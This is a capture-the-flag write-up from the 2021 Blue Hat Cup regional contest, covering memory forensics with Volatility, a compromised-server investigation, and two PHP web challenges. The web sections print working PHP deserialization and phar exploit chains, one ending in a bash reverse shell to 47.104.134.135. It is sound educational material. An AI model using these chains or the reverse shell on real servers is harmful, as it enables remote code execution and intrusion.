2021第五届蓝帽杯分区赛部分Writeup
2021/06/07 WriteUp WriteUp

部分wp,包括赛后复现的

北部赛区的会议室太小了,四支队伍对着坐,都能打麻将了

题还可以,不算阴间,只能说自己比赛的时候脑子没转过来,好多题复现的时候感觉自己就是个智障。。。

MIsc

博人的文件

这一个镜像里看到了仨题,估计是出题人用了自己的虚拟机出的题

F:\BaiduNetdiskDownload\博人的文件\misc
λ python2 D:\RayiTools\取证工具\volatility2\vol.py -f 博人的电脑.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (F:\BaiduNetdiskDownload\博人的文件\misc\博人的电脑.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf8000404d0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff8000404ed00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2021-04-23 04:59:23 UTC+0000
     Image local date and time : 2021-04-23 12:59:23 +0800

扫描文件,有一个hello.pdf

python2 D:\RayiTools\取证工具\volatility2\vol.py -f 博人的电脑.raw --profile=Win7SP1x64 filescan > file2.txt

image-20210606120004632

dump出来

python2 D:\RayiTools\取证工具\volatility2\vol.py -f 博人的电脑.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007e8a3f20 -n --dump-dir=./

(-Q 后面是 filescan 输出里该文件的物理偏移,是一整个参数,不要换行拆开)

用010editor查看,发现后门程序

image-20210606120159554

dump出相应的程序,这里有俩,只有一个dump出来的好使

image-20210606120232900

image-20210606120240666

解压出svhost.exe(注意是 svhost 而不是系统自带的 svchost.exe,这种仿冒系统进程名的命名本身就是一个可疑点),是一个pyinstaller打包的exe,用pyinstxtractor解包

修复下pyc文件头

image-20210606121353784

uncompyle6反编译

uncompyle6 transfer.pyc > transfer.py

找到相关ip和用户名

image-20210606121431064

根据hacker.zip的注释,得到解压密码192.168.0.129fei

image-20210606121530163

/home/share中找到了一个加密的压缩包setups

再去翻翻内存,从用户哈希中找到一个可疑的哈希,可以解出是jameslyl

python2 D:\RayiTools\取证工具\volatility2\vol.py -f 博人的电脑.raw --profile=Win7SP1x64 hashdump

image-20210606121920873

解压压缩包,得到图片result.png

图片放大看能看到许多彩色像素点,尝试用PIL库进行缩放

图片的尺寸为:3160 x 1846,像素点的排列间隔规律如下:

x : 14,13,14,13 ......
y : 31,32,31,31,32,31,31,31,32 ......

去掉边框后粗略计算,把图片缩放到宽 224-242、高 59-61 左右即可得到正确的缩放

为了确保缩放时PIL选取的像素点正确(不把相邻像素混合掉),采用Image.NEAREST的重采样方法,逐个尺寸试

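from PIL import Image

# Downscale result.png to every candidate grid size and save each one so
# the size that lines up with the dot grid can be picked out by eye.
# The bounds come from the measured dot spacing above (x step 13-14,
# y step 31-32); both ranges are inclusive here, which the original
# range(224,242)/range(59,61) loop was not (it stopped at 241 and 60).
source = Image.open('result.png')  # opened once, not once per size
for width in range(224, 243):
    for height in range(59, 62):
        # NEAREST picks single source pixels instead of averaging
        # neighbours, so the coloured dots are not blended into the border.
        scaled = source.resize((width, height), Image.NEAREST)
        scaled.save('{}x{}.png'.format(width, height))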

最后在234x59.png缩放部分找到了flag

234x59

溯源取证–被黑的系统

问题:

现在请你根据获取到的镜像服务器内容,回答以下问题:
q: 黑客通过哪个端口攻击进入的? == A
q: 黑客修改后的root密码是什么? == B
q: 黑客释放的工具服务端ip地址是什么? == C
q: 黑客窃取的秘密文件 md5 是什么? == D

flag = flag{md5(A-B-C-D)}

假如答案依次为 44,admin1234,1.2.3.4,ea8d35dca54375cbe711823545513fae
flag = flag(md5("44-admin1234-1.2.3.4-ea8d35dca54375cbe711823545513fae")) = flag{e9835dddd96a2ff70437c201618a8174}

vmdk文件,先用Xways挂载为磁盘,提取出文件分区

image-20210606165119704

然后上取证大师,看日志

image-20210606165856950

关于入侵端口,可以看出黑客是从thinkphp这里入侵的,thinkphp可能挂载在80或8080端口;具体端口应以镜像里 web 服务的监听配置或访问日志为准,不要只靠猜(本题最终取的是 8080)

image-20210606170033421

关于root密码,去爆破 /etc/shadow 里的 root 哈希

image-20210606170141370

关于秘密文件,可以看bash记录

image-20210606170400009

找到这个文件,计算md5,这个文件夹下俩文件的md5一样的

image-20210606170345483

关于攻击者的ip地址,可以找到frp工具,运行即可发现ip。注意:直接运行从被黑镜像里取出的攻击者二进制是有风险的,建议优先从随附的配置文件或 strings 输出里提取服务端地址;非要运行也应放在断网的隔离虚拟机里,而不是取证工作机上

image-20210607150205873

image-20210607150150663

image-20210607150142914

最终flag:

flag{md5(8080-123465-211.211.171.11-5363d0b99d892ecda988fd58e893bfe0)}
flag{d098c29b838c73e0819854c05f23307d}

Web

杰克与肉丝

审代码

<?php
// Prints this file's own source to the visitor (PHP magic constants are
// case-insensitive, so __file__ resolves like __FILE__). Everything
// below is reachable from the unserialize() call at the bottom.
highlight_file(__file__);


class Jack
{
    // Private: writing Jack->action from outside the class is an
    // inaccessible-property write, which routes into __set().
    private $action;


    // Called for writes to inaccessible properties; $a is the property
    // name, $b the assigned value. It calls method "$a" on whatever $b
    // is, so Titanic::__destruct's `people->action = ship` becomes
    // ship->action().
    function __set($a, $b)
    {
        $b->$a();

    }

}

class Love {

    public $var;
    // Reached when an inaccessible method (the private action() below)
    // is called from outside. The method name is ignored; whatever is
    // stored in $var is invoked, and an object with __invoke() qualifies.
    function __call($a,$b)
    {
        $rose = $this->var;
        call_user_func($rose);
    }

    // Private on purpose: Jack::__set calling ->action() lands in __call.
    private function action(){
        echo "jack love rose";
    }

}
class Titanic{
    public $people;
    public $ship;
    // Entry point of the chain: runs when the unserialized object is
    // freed. If $people is a Jack, this assignment hits Jack::__set.
    function __destruct(){

        $this->people->action=$this->ship;
    }
}
class Rose{
    public $var1;
    public $var2;
    // Final gadget: eval() on attacker-controlled data. The guard uses
    // loose != on the two values and md5()/sha1() of their string form.
    // For objects that means a property-wise comparison versus hashing
    // their __toString() output, so two objects that differ only in a
    // property __toString() does not print pass all three checks.
    function __invoke(){
        if( ($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1)=== sha1($this->var2)) ){
            eval($this->var1);
        }
    }
}

// Sink: unserialize() of a raw GET parameter. Any class above can be
// instantiated from the payload, and Titanic::__destruct starts the
// chain as soon as the result is discarded.
if(isset($_GET['love'])){
    $sail=$_GET['love'];
    unserialize($sail);
}
?>

反序列化,调用__invoke

然后利用Exception类绕过md5、sha1等:两个Exception对象message相同、code不同,`!=`按属性比较结果为真,而md5/sha1比较的是对象__toString()的输出(包含message、文件和行号,但不包含code),所以两个对象必须在同一行创建,哈希才会相同

https://blog.csdn.net/LYJ20010728/article/details/114493052

exp:

<?php

class Jack
{
    // Local stub for payload generation: the class name and this
    // private property (serialized as "\0Jack\0action") are all the
    // target needs. The method body is kept identical so the chain
    // behaves the same if it fires inside this script.
    private $action;
    function __set($a, $b)
    {
        $b->$a();

    }

}

class Love {

    public $var;
    // Local stub: __call forwards to whatever is in $var; with a Rose
    // stored there this is Rose::__invoke.
    function __call($a,$b)
    {
        $rose = $this->var;
        call_user_func($rose);
    }

    // Private so that ->action() from Jack::__set lands in __call.
    private function action(){
        echo "jack love rose";
    }

}
class Titanic{
    public $people;
    public $ship;
    // Chain start on the target. Note it also runs here, at this
    // script's shutdown, for the Titanic object built below.
    function __destruct(){

        $this->people->action=$this->ship;
    }
}
class Rose{
    public $var1;
    public $var2;
    // Same guard as the target. The else branch is a local debugging
    // aid: it only prints when the chain runs inside this generator
    // (which it does at shutdown via Titanic::__destruct), and
    // "nonono" there means the md5/sha1 comparison failed.
    function __invoke(){
        if( ($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1)=== sha1($this->var2)) ){
            eval($this->var1);
        }else{
            echo 'nonono';
        }
    }
}

// if(isset($_GET['love'])){
//     $sail=$_GET['love'];
//     unserialize($sail);
// }

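// Chain: Titanic (__destruct) -> Jack (__set) -> Love (__call)
// -> Rose (__invoke -> eval).
$a = new Titanic();
$b = new Jack();
$c = new Love();
$d = new Rose();
$file = "/flag";
// eval() receives the Exception's __toString() text, which begins with
// "Exception: ..."; the leading "?>" leaves PHP mode so only the
// embedded "<?php ... ?>" is executed. The ~ keeps the literal path out
// of the payload and urldecode(urlencode()) is a byte-preserving round
// trip, so include gets "/flag" back after the second ~ on the target.
$str = "?>"."<?php echo include~".urldecode(urlencode(~$file))."?>";
// Both exceptions MUST be created on the same line: Exception::__toString()
// embeds "in <file>:<line>", so md5()/sha1() of the two only match when
// message, file and line agree. They still compare != because the codes
// (1 vs 2) differ. On separate lines the guard fails ("nonono").
$except1 = new Exception($str, 1); $except2 = new Exception($str, 2);
$d->var1= $except1;
$d->var2= $except2;
$c->var = $d;
$a->ship = $c;
$a->people = $b;

echo urlencode(serialize($a));

// The same chain fires locally when $a is destroyed at shutdown
// (Titanic::__destruct -> ... -> eval). Pointing $people at a plain
// object turns that assignment into a harmless property set, so nothing
// is appended to the payload printed above.
$a->people = new stdClass();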

?>

不一样的web

先右键查看源码,发现一部分源码

class Read{
    public $name;
    // Leaks the challenge's lib.php source, base64-encoded. It is an
    // instance method, but the PoC later invokes it as ["Read","file_get"];
    // that static-style call only passes on older PHP (the page notes
    // 5.6) with a strict-standards notice, and is a fatal Error on PHP 8.
    public function file_get()
    {
        $text = base64_encode(file_get_contents("lib.php"));
        echo $text;
    }

}
class Test{
    public $f;
    public function __construct($value){
        $this->f = $value;
    }

    // Runs right after unserialize() - including the unserialize of phar
    // metadata - and calls whatever callable sits in $f with no
    // arguments. This is the gadget the phar PoC uses.
    public function __wakeup()
    {
        $func = $this->f;
        $func();
    }
}

随便上传一个gif文件,发现可以显示上传路径

image-20210604161406977

尝试check图片,显示文件存在,猜测存在phar反序列化漏洞(check 大概率用的是 file_exists 一类文件系统函数,这类函数支持 phar:// 协议,打开时会反序列化 phar 的 metadata)

image-20210604161458390

利用一开始给的源码,读出lib.php,注意php的版本是php5.6

<?php
class Read{
    public $name;
    // Local copy of the target class: only the class and method names
    // matter for the callable stored in the metadata; nothing here runs
    // while generating the phar.
    public function file_get()
    {
        $text = base64_encode(file_get_contents("lib.php"));
        echo $text;
    }

}

class Test{
    public $f;
    public function __construct($value){
        $this->f = $value;
    }

    // Local copy; __wakeup only fires on unserialize(), i.e. on the
    // target when it opens the phar, not while generating it here.
    public function __wakeup()
    {
        $func = $this->f;
        $func();
    }
}

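// Test::__wakeup will call ["Read","file_get"]() on the target once the
// phar metadata is unserialized.
$poc = new Test(array("Read","file_get"));

// Writing a phar needs phar.readonly=0 (e.g. `php -d phar.readonly=0 gen.php`).
$phar = new Phar('lib.phar');
$phar -> startBuffering();
// The stub is what lets a renamed .gif still be parsed as a phar.
$phar -> setStub('<?php __HALT_COMPILER();?>');
// Reconstructed from the garbled `$phar -> ad;` line (an undefined-property
// read that added nothing): give the archive a dummy entry, the same way
// the working generator later on this page does.
$phar -> addFromString('test.txt','test');
$phar -> setMetadata($poc);
$phar -> stopBuffering();
?>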



修改Content-Type和后缀(伪装成 gif 上传),上传后拿到保存路径,再用 phar:// 协议指向该路径去 check,触发 metadata 反序列化

![image-20210604163148366](http://pic.rayi.vip/image-20210604163148366.png)

得到`lib.php`源码,审计后直接弹shell

```php
<?php
// Hides notices and warnings on the target, which also hides the side
// effects of the magic-method chain below.
error_reporting(0);
class Modifier{
  public $old_id;
  public $new_id;
  public $p_id;
  public function __construct(){
    $this->old_id = "1";
    $this->new_id = "0";
    $this->p_id = "1";
  }
  // Reached when an undefined property is read (User::__toString reads
  // ->name, which Modifier does not have). The comparison looks
  // impossible because old_id is freshly randomised, but if old_id and
  // new_id are the same reference (=&, preserved by serialize() as R:)
  // the write updates both and system($p_id) runs.
  // NOTE(review): random_bytes() is PHP 7.0+; the page says the target
  // is 5.6, so either a polyfill exists or that version note is off.
  public function __get($value){
    $new_id = $value;
    // hint: use =&
    $this->old_id = random_bytes(16);
    if($this->old_id===$this->new_id){
      system($this->p_id);
    }
  }
}
class Read{
    // Leaks this file base64-encoded. The earlier phar PoC invoked this
    // instance method as ["Read","file_get"], which older PHP tolerates
    // with a notice; PHP 8 makes that a fatal Error.
    public function file_get()
    {
        $text = base64_encode(file_get_contents("lib.php"));
        echo $text;
    }

}
class Files{
  public $filename;
  public function __construct($filename){
    $this->filename = $this->FilesWaf($filename);
  }
  // Runs right after unserialize(); passing $filename through the WAF
  // already string-converts it (see FilesWaf), so the chain can fire here.
  public function __wakeup(){
    $this->FilesWaf($this->filename);
  }
  public function __toString(){
    return $this->filename;
  }
  // Chain start: stringifies $filename via FilesWaf. With a User object
  // in $filename that is User::__toString.
  public function __destruct(){
    echo "Your file is ".$this->FilesWaf($this->filename).".</br>";
    
  }
  // Only checks for "/"; stristr() converts a non-string $name to a
  // string, which is what triggers __toString on an object.
  public function FilesWaf($name){
    if(stristr($name, "/")!==False){
      return "index.php";
    }
    return $name;
  }
}
class Test{
    public $f;
    public function __construct($value){
        $this->f = $value;
    }

    // Calls the stored callable with no arguments as soon as the object
    // is unserialized; used by the earlier phar PoC to reach Read::file_get.
    public function __wakeup()
    {
    $func = $this->f;
        $func();
    }
}
class User{
  public $name;
  public $profile;
  public function __construct($name){
    $this->name = $this->UserWaf($name);
    $this->profile = "I am admin.";
  }
  public function __wakeup(){
    $this->UserWaf($this->name);
  }
  // Reads ->name on whatever $profile is. With $profile set to a
  // Modifier (which has no name property) this lands in Modifier::__get.
  public function __toString(){
    return $this->profile->name;
  }
  public function __destruct(){
    echo "Hello ".$this->UserWaf($this->name).".</br>";
    
  }
  // Only constrains $name (length and at least one hex character);
  // $profile is never validated.
  public function UserWaf($name){
    if(strlen($name)>10){
      return "admin";
    }
    if(!preg_match("/[a-f0-9]/iu",$name)){
      return "admin";
    }
    return $name;
  }
}

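// Chain on the target: Files::__wakeup/__destruct -> FilesWaf(stristr)
// stringifies $filename -> User::__toString reads profile->name
// -> Modifier::__get -> system($p_id).
// Both constructors take a required argument. The values are overwritten
// below, but passing them avoids the missing-argument warnings (an
// ArgumentCountError on PHP 7.1+); the serialized result is unchanged.
$a = new Files('x');
$a->filename = new User('admin');
$shell = new Modifier();
$shell->p_id = 'bash -c "bash -i >& /dev/tcp/47.104.134.135/2333 0>&1"';
// Make old_id and new_id one reference; serialize() records it as R:
// so it survives into the phar metadata and defeats the random_bytes check.
$shell->old_id =& $shell->new_id;
$a->filename->profile = $shell;
echo serialize($a);
// Writing a phar needs phar.readonly=0 (e.g. `php -d phar.readonly=0 gen.php`).
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER();?>');
$phar->addFromString('test.txt','test');
$phar->setMetadata($a);
$phar->stopBuffering();
// The archive is on disk now. Detach the User so the local
// Files::__destruct at shutdown does not walk the same chain and run
// $p_id (the reverse shell) on this host.
$a->filename = 'shell.phar';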
?>

写马

image-20210604170158929

根目录有个game,下载下来,运行,多试两遍就有密码了

image-20210604170411338

用flag用户登录就有flag

image-20210604122502361

本文作者:Rayi
版权声明:本文首发于Rayi的博客,转载请注明出处!